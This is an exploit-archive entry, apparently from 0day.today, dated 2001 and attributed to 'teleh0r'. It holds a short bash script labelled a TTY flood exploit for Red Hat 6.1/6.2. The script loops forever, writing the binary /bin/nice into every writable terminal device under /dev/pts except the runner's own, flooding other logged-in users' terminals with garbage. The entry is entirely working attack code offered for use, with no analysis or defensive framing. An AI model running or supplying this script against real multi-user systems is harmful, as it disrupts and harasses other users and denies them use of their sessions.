id: 5808
date: 01/02/2001
title: Redhat 6.1 / 6.2 TTY Flood Users Exploit
author: teleh0r
cves: 

========================================
Redhat 6.1 / 6.2 TTY Flood Users Exploit
========================================


#!/bin/bash
#
# by teleh0r

TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY

while /bin/true ; do
    for i in $TTYDIR/* ; do
        if [ -w $i -a -c $i -a $i != $MYTTY ]; then
            cat $NONSENSE > $i
        fi
    done
done

unset i




#  0day.today [2023-03-24]  #